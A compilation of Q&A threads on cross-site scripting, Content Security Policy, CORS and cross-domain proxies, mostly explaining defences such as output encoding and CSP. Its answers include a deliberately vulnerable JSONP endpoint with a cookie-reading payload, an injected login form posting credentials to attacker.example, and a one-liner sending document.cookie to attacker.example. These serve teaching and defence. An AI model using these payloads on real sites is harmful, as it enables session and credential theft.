Can XSS be prevented 100% by setting the Content Security Policy to default-src 'self'? Is there any way XSS can happen in that case? One possibility I can think of is injecting user input into one of your scripts dynamically on the server side. Do you agree? Are there any other vulnerabilities you can think of?
No, CSP is not a magic bullet. It should be one line of defense, not the entire defense. If properly configured, it can help with:
preventing usable XSS, where the payload, whether persistent or reflected, must be small and would therefore usually just create a script element and inject external code
avoiding data extraction and misuse of your site as a platform to attack other sites. Depending on how your application works, access to your backend service may suffice to extract data; for instance, if your users can write blog posts, an attacker could create a new post containing the data they want to extract, wait for a signal that the data has been grabbed (via a comment, for instance), and delete the post again, all without communicating with external servers.
To answer the question: yes, a modern browser with default-src 'self' can still execute user-controlled JavaScript: JSONP.
Of particular note is our lack of self in our source list. While sourcing JavaScript from self seems relatively safe (and extremely common), it should be avoided when possible.
There are edge cases that any developer must concern themselves with when allowing self as a source for scripts. There may be a forgotten JSONP endpoint that doesn't sanitize the callback function name.
From http://githubengineering.com/githubs-csp-journey/
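To make that concrete, here is a minimal sketch of such a forgotten JSONP endpoint (hypothetical Node/Express code; the route and field names are made up for illustration). Because the response is served from your own origin it satisfies default-src 'self', yet the unsanitized callback parameter lets an attacker choose what code runs:

// Hypothetical vulnerable JSONP endpoint (illustration only).
var express = require('express');
var app = express();

app.get('/api/user.jsonp', function (req, res) {
  var callback = req.query.callback;              // attacker-controlled, never validated
  var data = JSON.stringify({ name: 'alice' });
  res.type('application/javascript');
  res.send(callback + '(' + data + ')');          // callback is echoed verbatim into script output
});

app.listen(3000);

An injected <script src="/api/user.jsonp?callback=alert(document.cookie);//"></script> is same-origin as far as CSP is concerned, so the policy does not block it.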
CSP should not be used as the only way to prevent XSS attacks. This mechanism works only client-side (if you save malicious data into your DB, you can end up infecting other systems that you integrate with), and it's not implemented by all browsers (http://caniuse.com/#search=csp).
To prevent XSS you should always validate input data and encode output data. You can also print a warning message in the JavaScript console to discourage Self-XSS attacks (e.g. open a Facebook page and turn on Chrome Developer Tools, then look at the message in the console).
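As a sketch of output encoding for HTML contexts (the function below is illustrative; in practice prefer your framework's templating or a vetted library):

// Minimal HTML entity encoder for untrusted text placed into element content (illustrative).
function encodeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

var userName = '<img src=x onerror=alert(1)>';     // example untrusted input
console.log(encodeHtml(userName));                 // -> &lt;img src=x onerror=alert(1)&gt;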
Remember that the user input on the website is not the only source of XSS. Malicious data can also come from:
Importing data from files
Importing data from third party systems
Migrating data from an old system.
Cookies and HTTP headers.
If you have appropriate validation and encoding of data (server-side), then you can additionally apply browser mechanisms such as CSP, X-XSS-Protection, or X-Content-Type-Options to increase your confidence in your system's safety.
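For instance, the corresponding response headers might look like this (illustrative values, not a recommended policy):

Content-Security-Policy: default-src 'self'
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff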
Is it possible to send a function to a new window and get the result back in the parent window (after which the child window should be closed)?
For example, I have an array of URLs:
var urls = ["first.com", "second.com", "third.com", /* ... */];
and a function
function parse(url){...}
then I loop over them:
for (var i = 0; i < urls.length; i++) { window.open(urls[i]); }
How can I send "parse" and get its result?
Based on the sample code provided, and the fact that the domains are different, I'm going to assume that you don't own all of the domains that you're trying to open...
You need to do a bit of research on cross site scripting, and the implications of this type of functionality. To get you started, here's the definition of cross site scripting, found here.
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
TLDR: Simply put, if you don't own the domains, what you're trying to do is not possible client-side.
As mentioned by James Hill, this does not seem to be possible. If it helps, try web scraping to extract data from the websites and process that data in functions on your own site.
There is already a chrome extension for web scraping:
https://chrome.google.com/webstore/detail/web-scraper/jnhgnonknehpejjnehehllkliplmbmhn
I understand there are lots of questions concerning Cross-Site Scripting on SO, and I have tried to read the most voted ones. Having read some webpages too, I'm still unsure about all the possibilities this attack type can use. I'm not asking how to sanitize input, but rather what one can expect.
In most examples given on SO and other pages there are two methods, of which the simplest (e.g. this one on PHPMaster) seems to be inserting some <script> code used for stealing cookies etc.
The other, presented here by user Baba, is to insert a full <form> structure; it seems this should not work until the user submits the form, however a JavaScript event like ... onmouseover='form.submit()' ... might be used.
All the examples I've been able to find online are methods based on using some JavaScript code.
Is it possible to use other methods, say -- somehow -- changing the HTML, or even the server-side script?
I know one can achieve this by SQL injection or just hacking the server, but I mean only by manipulating (wrongly handled) GET or POST requests -- or perhaps some other way?
Cross-Site Scripting is not just about inserting JavaScript code into a web page. It is rather a general term for any injection of code that gets interpreted by the browser in the context of the vulnerable web page, see CWE-79:
During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc.
An attacker could, for example, inject their own login form into an existing login page, one that sends the credentials to their site instead. This would also be called XSS.
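For example, injected markup along these lines (hypothetical; attacker.example is a placeholder) would silently send credentials to the attacker's server, with no JavaScript involved:

<!-- Hypothetical injected markup: a fake login form posting to the attacker's host. -->
<form action="https://attacker.example/steal" method="POST">
  Username: <input name="user">
  Password: <input name="pass" type="password">
  <input type="submit" value="Log in">
</form>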
However, it is often easier and more promising to inject JavaScript, as it can both control the document and the victim's browser. With JavaScript an attacker can read cookies and thus steal a victim's session cookie to hijack the victim's session. In certain cases, an attacker would even be able to execute arbitrary commands on the victim's machine.
The attack vectors for XSS are diverse, but they all have in common that they are possible due to some improperly handled input. This can be parameters provided via GET or POST, but also any other information contained in the HTTP request, e.g. cookies or other HTTP header fields. Some use a single injection point, others are split up across multiple injection points; some are direct, some are indirect; some are triggered automatically, some require certain events; etc.
I know one can achieve this by SQL injection or just hacking the server, but I mean only by manipulating (wrongly handled) GET or POST requests -- or perhaps some other way?
GET parameters and POST bodies are the primary vector for attacking a web application via HTTP requests, but there are others. If you aren't careful about file uploads, then I might be able to upload a Trojan. If you naively host uploaded files in the same domain as your website, then I can upload JS or HTML and have it run with same-origin privileges. Request headers are also inputs that an attacker might manipulate, but I don't know of successful attacks that abuse them.
Code-injection is a class of attacks that includes XSS, SQL Injection, Shell injection, etc.
Any time a GET or POST parameter that is controlled by an attacker is turned into code or a programming language symbol, you risk a code-injection vulnerability.
If a GET or POST parameter is naively interpolated into a string of SQL, then you risk SQL injection.
If a GET or POST parameter (or header like the filename in a file upload) is passed to a shell, then you risk shell injection and file inclusion.
If your application uses your server-side language's equivalent of eval with an untrusted parameter, then you risk server-side script injection.
You need to be suspicious of all your inputs, treat them as plain text strings, and when composing a string in another language, convert the plain text string into a substring in that target language by escaping. Filtering can provide defense in depth here.
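As a sketch of that principle for the SQL case (hypothetical Node code; the mysql driver and the connection settings are assumptions for illustration):

var mysql = require('mysql');                       // assumed driver, for illustration only
var db = mysql.createConnection({ host: 'localhost', user: 'app', database: 'appdb' });
var userName = "o'brien";                            // example untrusted input

// Risky: the untrusted value is interpolated straight into the SQL syntax.
// var risky = "SELECT * FROM users WHERE name = '" + userName + "'";

// Safer: the value is passed as a bound parameter and never becomes part of the SQL syntax.
db.query('SELECT * FROM users WHERE name = ?', [userName], function (err, rows) {
  // handle err / rows here
});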
XSS - is it only possible by using JavaScript?
No. VBScript can be injected in IE. JavaScript can be injected indirectly via URLs and via CSS. Injected images can leak secrets hidden in the referrer URL. Injected meta tags or iframes can redirect to a phishing version of your site.
Systems that are vulnerable to HTTP response header splitting can be subverted by HTML & scripts injected into response headers like redirect URLs or Set-Cookie directives.
HTML embeds so many languages that you need to be very careful about including snippets of HTML from untrusted sources. Use a white-listing sanitizer if you must include foreign HTML in your site.
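For instance, a usage sketch with a whitelisting sanitizer such as DOMPurify (assuming the library is loaded on the page; the element id and variable names are illustrative):

// Sanitize untrusted HTML before inserting it into the document.
var untrustedHtml = '<img src=x onerror=alert(1)><b>hello</b>';   // example foreign HTML
var clean = DOMPurify.sanitize(untrustedHtml);                    // strips the onerror handler
document.getElementById('comments').innerHTML = clean;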
XSS is about JavaScript.
However, to inject your malicious JavaScript code you have to use a vulnerability in the page's code, which might be on the server or client side.
You can use CSP (Content Security Policy) to prevent XSS in modern browsers.
There is also a list of XSS tricks in the XSS Cheat Sheet. However, most of those tricks won't work in modern browsers.
WebKit won't execute JavaScript if it is also part of the request.
For example, demo.php?x=<script>alert("xss")</script> won't display an alert box even if the script tag gets injected into the DOM. Instead, the following error is thrown:
"Refused to execute a JavaScript script. Source code of script found within request."
I have had a scan performed on my website looking for vulnerabilities, etc. The report came back saying there was a risk of an XSS attack. I have looked into my website code and the only issue I can find (which is causing a W3C validation error) is that I have accidentally added 'language="javascript"' to my script tag... could this have thrown the error which they have reported? I don't have any form inputs and it is not connected to a database.
Many thanks in advance.
No, using language="javascript" on your script tags won't create an XSS vulnerability, even though it's bad practice. Unfortunately, I can't tell where your possible XSS vulnerability comes from without any relevant code.
Any reputable consultant should make it clear in their report exactly what the risk is and how it is reproduced. I'd expect to see documented methodology, findings and conclusions.
If they can't demonstrate a risk then they can't say they have found one.
UPDATE:
Based on your comment I've found the following, which identifies this as a general vulnerability with the Apache webserver rather than your particular code. You should ask whoever manages your webhosting to comment.
A flaw in the handling of invalid Expect headers. If an attacker can influence the Expect header that a victim sends to a target site they could perform a cross-site scripting attack. It is known that some versions of Flash can set an arbitrary Expect header which can trigger this flaw. Not marked as a security issue for 2.0 or 2.2 as the cross-site scripting is only returned to the victim after the server times out a connection.
see:
http://www.rapid7.com/vulndb/lookup/http-apache-expect-header-xss
also:
http://www.iss.net/security_center/reference/vuln/HTTP_Apache_Expect_XSS.htm
UPDATE 2:
The following is a description of the vulnerability (link). Ask your hosting people to check their servers are properly patched.
In May 2006 a reporter found a bug in Apache where an invalid Expect header sent to the server (Apache 1.3.3 onwards) would be returned to the user in an error message, unescaped. This could allow a cross-site scripting attack only if a victim can be tricked into connecting to a site and sending such a carefully crafted Expect header. Whilst browsers do not provide this functionality, it was recently discovered that Flash allows you to make a connection with arbitrary headers. The attack mechanism is therefore:
User is tricked into visiting a malicious web site with a Flash-enabled browser
Malicious web site uses a Flash movie to make a connection to the target site with a custom Expect header
This results in cross-site scripting (the attacker could steal your cookies from the third-party site, or inject content, etc.)
If you're sure that no user input can ever make its way into the content served on your pages, then there can't be any XSS.
I was reading about CORS and I think the implementation is both simple and effective.
However, unless I'm missing something, I think there's a big part missing from the spec. As I understand, it's the foreign site that decides, based on the origin of the request (and optionally including credentials), whether to allow access to its resources. This is fine.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site? The foreign site is obviously going to authenticate the request. Hence, again if I'm not missing something, CORS actually makes it easier to steal sensitive information.
I think it would have made much more sense if the original site could also supply an immutable list of servers its page is allowed to access.
So the expanded sequence would be:
Supply a page with list of acceptable CORS servers (abc.com, xyz.com, etc)
Page wants to make an XHR request to abc.com - the browser allows this because it's in the allowed list and authentication proceeds as normal
Page wants to make an XHR request to malicious.com - request rejected locally (ie by the browser) because the server is not in the list.
I know that malicious code could still use JSONP to do its dirty work, but I would have thought that a complete implementation of CORS would imply the closing of the script tag multi-site loophole.
I also checked out the official CORS spec (http://www.w3.org/TR/cors) and could not find any mention of this issue.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site?
What about it? You can already do that without CORS. Even back as far as Netscape 2, you have always been able to transfer information to any third-party site through simple GET and POST requests caused by interfaces as simple as form.submit(), new Image or setting window.location.
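For instance (an illustrative snippet; attacker.example is a placeholder), a single line suffices, and no CORS is involved at all:

// The browser will happily request a cross-origin image, leaking the data in the URL.
new Image().src = 'https://attacker.example/collect?d=' + encodeURIComponent(document.cookie);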
If malicious code has access to sensitive information, you have already totally lost.
3) Page wants to make an XHR request to malicious.com - request rejected locally
Why would a page try to make an XHR request to a site it has not already whitelisted?
If you are trying to protect against the actions of malicious script injected due to XSS vulnerabilities, you are attempting to fix the symptom, not the cause.
Your worries are completely valid.
However, more worrisome is the fact that there doesn't need to be any malicious code present for this to be taken advantage of. There are a number of DOM-based cross-site scripting vulnerabilities that allow attackers to take advantage of the issue you described and insert malicious JavaScript into vulnerable webpages. The issue is more than just where data can be sent, but where data can be received from.
I talk about this in more detail here:
http://isisblogs.poly.edu/2011/06/22/cross-origin-resource-inclusion/
http://files.meetup.com/2461862/Cross-Origin%20Resource%20Inclusion%20-%20Revision%203.pdf
It seems to me that CORS is purely expanding what is possible, and trying to do it securely. I think this is clearly a conservative move. Making the cross-domain policy on other tags (script/image) stricter, while more secure, would break a lot of existing code and make it much more difficult to adopt the new technology. Hopefully, something will be done to close that security hole, but I think they need to make sure it's an easy transition first.
I also checked out the official CORS spec and could not find any mention of this issue.
Right. The CORS specification is solving a completely different problem. You're mistaken that it makes the problem worse - it makes the problem neither better nor worse, because once a malicious script is running on your page it can already send the data anywhere.
The good news, though, is that there is a widely-implemented specification that addresses this problem: the Content-Security-Policy. It allows you to instruct the browser to place limits on what your page can do.
For example, you can tell the browser not to execute any inline scripts, which will immediately defeat many XSS attacks. Or—as you've requested here—you can explicitly tell the browser which domains the page is allowed to contact.
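For example, a policy along these lines (illustrative values) limits both where scripts may load from and which hosts XHR/fetch may contact:

Content-Security-Policy: script-src 'self'; connect-src 'self' https://api.example.com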
The problem isn't that a site can access another site's resources that it already had access to. The problem is one of domain: if I'm using a browser at my company, and an Ajax script maliciously decides to try out 10.0.0.1 (potentially my gateway), it may have access simply because the request is now coming from my computer (perhaps 10.0.0.2).
So the solution -- CORS. I'm not saying it's the best, but it solves this issue.
1) If the gateway can't return the 'bobthehacker.com' accepted origin header, the request is rejected by the browser. This handles old or unprepared servers.
2) If the gateway only allows items from the myinternaldomain.com domain, it will reject an ORIGIN of 'bobthehacker.com'. In the simple CORS case, it will actually still return the results by default; you can configure the server to not even do that. Then the results are discarded without being loaded by the browser.
3) Finally, even if it would accept certain domains, you have some control over the headers that are accepted and rejected to make the request from those sites conform to a certain shape.
Note -- the Origin header and the OPTIONS preflight are controlled by the requester -- obviously someone creating their own HTTP request can put whatever they want in there. However, a modern CORS-compliant browser WON'T do that. It is the browser that controls the interaction. The browser is preventing bobthehacker.com from accessing the gateway. That is the part you are missing.
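A rough sketch of that server-side check (hypothetical Node/Express code; the domain names are placeholders):

var express = require('express');
var app = express();

var ALLOWED_ORIGINS = ['https://myinternaldomain.com'];

app.use(function (req, res, next) {
  var origin = req.get('Origin');
  // Only echo back origins we trust; 'bobthehacker.com' never receives this header,
  // so the browser refuses to hand the response over to its scripts.
  if (origin && ALLOWED_ORIGINS.indexOf(origin) !== -1) {
    res.set('Access-Control-Allow-Origin', origin);
  }
  next();
});

app.listen(8080);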
I share David's concerns.
Security must be built layer by layer and a white list served by the origin server seems to be a good approach.
Plus, this white list can be used to close existing loopholes (forms, script tag, etc.); it's safe to assume that a server serving the white list is designed to avoid backwards-compatibility issues.
http://developer.yahoo.com/javascript/howto-proxy.html
Are there disadvantages to this technique? The advantage is obvious: you can use a proxy to get XML or JavaScript from another domain with XMLHttpRequest without running into same-origin restrictions. However, I have not heard about disadvantages compared to other methods -- are there any, and what might they be?
Overhead - things are going to be a bit slower because you're going through an intermediary.
There are security issues if you allow access to any external site via the proxy - be sure to lock it down to the specific site (and probably specific URL) of the resource you're proxying.
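A minimal sketch of such a locked-down proxy (hypothetical Node/Express code; the upstream URL is an example):

var express = require('express');
var https = require('https');
var app = express();

// Only this exact upstream resource may ever be proxied; no user-supplied URLs.
var ALLOWED_UPSTREAM = 'https://feeds.example.com/data.xml';

app.get('/proxy', function (req, res) {
  https.get(ALLOWED_UPSTREAM, function (upstream) {
    res.set('Content-Type', upstream.headers['content-type'] || 'text/plain');
    upstream.pipe(res);                             // stream the upstream body back to the caller
  }).on('error', function () {
    res.sendStatus(502);
  });
});

app.listen(3000);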
Overhead -- both for the user (who now has to wait for your server to make requests to and receive data from the proxied source) and for you (as you're now taking on all the traffic for the other server in addition to your own).
Also security concerns -- if you are using a proxy to bypass browser security checks for displaying untrusted content, you are deliberately sabotaging the browser security model -- potentially allowing the user to be compromised -- so unless you absolutely trust the server you are communicating with (that means no random ads, no user defined content in the page[s] you are proxying) you should not do this.
I suppose there could be security considerations, though others are likely to be more qualified than me to address that. I've been running such a proxy on my personal site for a while now and haven't run into problems.